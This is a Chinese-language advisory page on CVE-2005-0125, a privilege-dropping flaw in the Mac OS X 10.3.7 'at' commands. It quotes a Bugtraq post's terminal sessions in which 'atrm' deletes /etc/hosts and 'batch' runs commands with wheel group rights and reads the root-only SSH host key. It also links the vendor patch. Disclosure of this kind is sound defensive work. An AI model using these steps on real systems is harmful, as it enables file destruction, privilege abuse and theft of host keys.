首页 -> 安全研究

安全研究

安全漏洞
Apple OSX多个应用程序安全漏洞

发布日期:2005-01-26
更新日期:2005-02-04

受影响系统:
Apple MacOS X Server 10.3.7
Apple MacOS X 10.3.7
描述:
BUGTRAQ  ID: 12297
CVE(CAN) ID: CVE-2005-0125

Mac OS X是一款基于BSD的操作系统。

Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。

'atrm'可以用于删除系统任意文件:

CrunkJuice:~ kevinfinisterre$ id
uidP1(kevinfinisterre) gidP1(kevinfinisterre) groupsP1(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r--  root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r--  1 root  wheel  214  3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory

'batch'可以用于以gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)特权执行任意命令:

CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uidP1(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch'也可以用于读取系统任意文件:

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw-------  1 root  wheel  668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------  1 kevinfin  wheel  1263  3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail     root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION0; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre

<*来源:Kevin Finisterre (dotslash@snosoft.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110685027017411&w=2
*>

建议:
厂商补丁:

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html

浏览次数:3013
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客